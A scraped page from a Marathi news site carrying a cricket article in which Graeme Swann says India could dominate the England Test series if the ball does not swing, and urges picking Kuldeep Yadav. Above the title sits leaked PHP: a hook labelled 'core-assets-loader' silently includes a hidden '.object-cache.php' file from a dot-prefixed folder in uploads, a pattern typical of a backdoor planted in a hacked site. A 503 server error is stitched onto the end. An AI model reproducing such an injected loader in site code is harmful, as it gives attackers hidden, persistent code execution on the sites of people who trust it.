add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); चेंडू स्विंग न झाल्यास भारताचे वर्चस्व! – SOCH INDIA
Menu

खेल
चेंडू स्विंग न झाल्यास भारताचे वर्चस्व!

nobanner

इंग्लंडचा माजी फिरकी गोलंदाज ग्रॅमी स्वानचा दावा

चेंडू स्विंग करण्यात इंग्लिश गोलंदाज अपयशी ठरले तर कसोटी मालिकेत भारतीय संघ आक्रमकपणे पुनरागमन करू शकेल, असा दावा इंग्लंडचा माजी ऑफ-स्पिनर ग्रॅमी स्वानने केला आहे.

एकदिवसीय मालिकेत भारताचा २-१ असा पराभव केल्यामुळे पाच सामन्यांच्या कसोटी मालिकेकडे वाटचाल करताना इंग्लंडचा आत्मविश्वास दुणावला आहे. या मालिकेतील पहिल्या कसोटीला १ ऑगस्टपासून बर्मिगहॅम येथे प्रारंभ होत आहे.

‘‘चेंडू स्विंग झाला नाही, तर इंग्लंडला नंतर रिव्हर्स स्विंगवर विसंबून राहावे लागेल. मागील मालिकेत इंग्लंडने चांगली कामगिरी केली. कारण जेम्स अँडरसनने चेंडू उत्तमपणे स्विंग केले. अँडरसन गोलंदाजी करतो, तेव्हा चेंडू स्विंग व्हावा असे जगभरातील फलंदाजांना अजिबात वाटत नाही. त्यामुळे अँडरसनसाठी प्रतिकूल परिस्थिती मिळाली, तर विराट कोहली सहजपणे ६०-७० धावांपर्यंत मजल मारू शकेल,’’ असे स्वानने सांगितले.

‘‘चेंडू स्विंग झाल्यास इंग्लंड सहजपणे कसोटी मालिका जिंकू शकेल. परंतु तसे घडले नाही, तर ही मालिका रंगतदार होऊ शकेल. कसोटी मालिकेसाठी अनुरूप असा दर्जेदार फिरकी मारा इंग्लंडकडे नाही. त्यामुळे भारतासाठी ही उत्तम संधी ठरू शकते,’’ असे स्वान या वेळी म्हणाला.

कुलदीपला प्राधान्य हवे!

पहिल्या कसोटीसाठी संघनिवड करताना कुलदीप यादवला रविचंद्रन अश्विन किंवा रवींद्र जडेजा यांच्याआधी संधी द्यायला हवी, असा सल्ला स्वानने दिला. मात्र या डावखुऱ्या मनगटी फिरकी गोलंदाजाला अधिक खेळवून, त्याची जादू निष्प्रभ करू नका, असा इशारासुद्धा स्वानने दिला. मर्यादित षटकांच्या क्रिकेटमध्ये कुलदीपने ५ सामन्यांत १४ बळी मिळवले आहेत. ‘‘मी जर भारतीय संघव्यवस्थापनात असतो, तर कसोटी संघात त्याची प्राधान्याने निवड केली असती. कारण इंग्लिश फलंदाजांना त्याची गुगली समजत नाही. तो फलंदाजाला पुरेसा विचार करायची संधी देत नाही,’’ असे स्वानने सांगितले.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.